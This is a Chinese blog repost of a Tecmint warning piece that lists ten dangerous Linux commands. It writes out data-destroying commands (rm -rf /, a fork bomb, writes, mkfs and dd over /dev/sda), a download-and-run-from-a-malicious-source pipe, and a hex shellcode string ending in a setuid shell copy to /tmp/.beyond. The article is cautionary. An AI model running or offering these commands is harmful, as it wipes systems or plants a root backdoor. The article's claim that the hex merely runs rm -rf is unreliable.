侧边栏壁纸
博主头像
WinJay博主等级

博观而约取 厚积而薄发

  • 累计撰写 307 篇文章
  • 累计创建 165 个标签
  • 累计收到 1 条评论
隐藏侧边栏

永远不要在 Linux 执行的 10 个最危险的命令

WinJay
2014-05-21 / 0 评论 / 0 点赞 / 55 阅读 / 2,564 字 / 正在检测是否收录...
温馨提示:
本文最后更新于 2022-01-21,若内容或图片失效,请留言反馈。部分素材来自网络,若不小心影响到您的利益,请联系我们删除。

Linux命令行佷有用、很高效,也很有趣,但有时候也很危险,尤其是在你不确定你自己在正 在做什么时候。这篇文章并不打算引来你对Linux或linux 命令行的愤怒。我们只是想让你意识到在你运行某些命令时应该三思而后行。(译注:当然,以下命令通常都是在root权限下才能将愚蠢发挥到无可救药;在普 通用户身份下,破坏的只是自己的一亩三分地。)

100744lmgomq4g44wwv7mm.jpg

1. rm -rf

rm -rf命令是删除文件夹及其内容最快的方式之一。仅仅一丁点的敲错或无知都可能导致不可恢复的系统崩坏。下列是一些rm 命令的选项。

  • rm 命令在Linux下通常用来删除文件。
  • rm -r 命令递归的删除文件夹,甚至是空的文件夹。(译注:个人认为此处应该是说错了,从常识看,应该是“甚至是非空的文件夹”)
  • rm -f 命令能不经过询问直接删除‘只读文件’。(译注:Linux下删除文件并不在乎该文件是否是只读的,而只是在意其父目录是否有写权限。所以,-f这个参数 只是表示不必一个个删除确认,而是一律悄悄删除。另外,原始的rm命令其实也是没有删除提示的,只是一般的发行版都会将rm通过别名的方式增加-i参数来 要求删除确认,而-f则抑制了这个提示。)
  • rm -rf / : 强制删除根目录下所有东东。(就是说删除完毕后,什么也没有了。。。)
  • rm -rf *: 强制删除当前目录的所有文件。
  • rm -rf . : 强制删除当前文件夹及其子文件夹。

从 现在起,当你要执行rm -rf命令时请留心一点。我们可以在“.bashrc”文件对‘rm‘命令创建rm -i的别名,来预防用 ‘rm‘命令删除文件时的事故,它会要求你确认每一个删除请求。(译注:大多数发行版已经这样做了,如果还没有,请这样做,并在使用-f参数前一定考虑好 你在做什么!译者本人有着血泪的教训啊。)

2. :(){:|:&};:

这就是个fork 炸弹的实例。具体操作是通过定义一个名为 ‘:‘的函数,它会调用自己两次,一次在前台另一次运行在后台。它会反复的执行下去直到系统崩溃。

:(){:|:&};:

哦?你确认你要试试么?千万别在公司正式的服务器上实验啊~~

3. > /dev/sda

上列命令会将某个‘命令‘的输出写到块设备/dev/sda中。该操作会将在块设备中的所有数据块替换为命令写入的原始数据,从而导致整个块设备的数据丢失。

4. mv folder /dev/null

这 个命令会移动某个‘文件夹‘到/dev/null。在Linux中 /dev/null 或 null 设备是一个特殊的文件,所有写入它的数据都会被清除,然后返回写操作成功。(译注:这就是黑洞啊。当然,要说明的是,通过将文件夹移动到黑洞,并不能阻止 数据恢复软件的救赎,所以,真正的彻底毁灭,需要采用专用的软件或者手法来完成——我知道你肯定有些东西想删除得干干净净的。)

# mv /home/user/* /dev/null

5. wget http:// malicious_source -O- | SH

上面的命令将从恶意源下载脚本,然后执行它。Wget命令将下载脚本,而sh将执行下载的脚本。

注意:您应该非常了解从中下载软件包和脚本的源。仅使用从受信任来源下载的那些脚本/应用程序。

6. mkfs.ext3 / dev / sda

上面的命令将格式化块“ sda”,您肯定会知道,执行完上述命令后,您的块(硬盘驱动器)将是全新的,**全新的!**没有任何数据,将使系统进入不可恢复的阶段。

7.>file

上面的命令用于刷新文件的内容。如果执行上述命令时遇到错字或无知,例如“ **> xt.conf”,**将写入配置文件或任何其他系统或配置文件。

8. foo bar

如我们的10个“鲜为人知的Linux命令”中所述,此命令用于编辑先前的run命令,而无需再次重新键入整个命令。但是,如果您没有冒用 foo bar命令彻底检查原始命令中的更改的风险,那么这确实很麻烦。

9. dd if = / dev / random = / dev / sda

上面的命令将擦除sda块并将随机的垃圾数据写入该块。当然!您的系统将处于不一致且不可恢复的阶段。

10.隐藏命令

下面的命令不过是上面的第一个命令(rm -rf)。在这里,代码隐藏在十六进制中,因此无知的用户可能会被愚弄。在终端中运行以下代码将擦除您的分区。

此命令在此表明威胁可能是隐藏的,有时通常无法检测到。您必须知道自己在做什么以及将会得到什么结果。不要编译/运行来自未知来源的代码。

char esp [] __attribute__((section(“。text”)))/ * esp
release */
=“ \ xeb \ x3e \ x5b \ x31 \ xc0 \ x50 \ x54 \ x5a \ x83 \ xec \ x64 \ x68”
“ \ xff \ xff \ xff \ xff \ x68 \ xdf \ xd0 \ xdf \ xd9 \ x68 \ x8d \ x99”
“ \ xdf \ x81 \ x68 \ x8d \ x92 \ xdf \ xd2 \ x54 \ x5e \ xf7 \ x16 \ xf7”
“ \ x56 \ x04 \ xf7 \ x56 \ x08 \ xf7 \ x56 \ x0c \ x83 \ xc4 \ x74 \ x56”
“ \ x8d \ x73 \ x08 \ x56 \ x53 \ x54 \ x59 \ xb0 \ x0b \ xcd \ x80 \ x31”
“ \ xc0 \ x40 \ xeb \ xf9 \ xe8 \ xbd \ xff \ xff \ xff \ x2f \ x62 \ x69”
“ \ x6e \ x2f \ x73 \ x68 \ x00 \ x2d \ x63 \ x00”
“ cp -p / bin / sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

注意: 不要在你的或你的同学或学校的电脑里的Linux终端或Shell执行以上的任何一个命令。如果你想测试它们,请在虚拟机上运行。任何不和谐或数据丢失,由于运行上面的命令导致你的系统崩溃,文章作者和Tecmint概不负责。(译注:译者和转载网站也不负责~!)

今天就到此为止吧,我会很快回来这里,同时带上另一篇你们喜欢的文章。到那时请继续关注和访问Tecmint。如果你知道任何其他危险的Linux命令,也想添加到我们的列表中,请通过评论留言给我们同时也别忘了留下你的宝贵意见。

via: http://www.tecmint.com/10-most-dangerous-commands-you-should-never-execute-on-linux/

0

评论区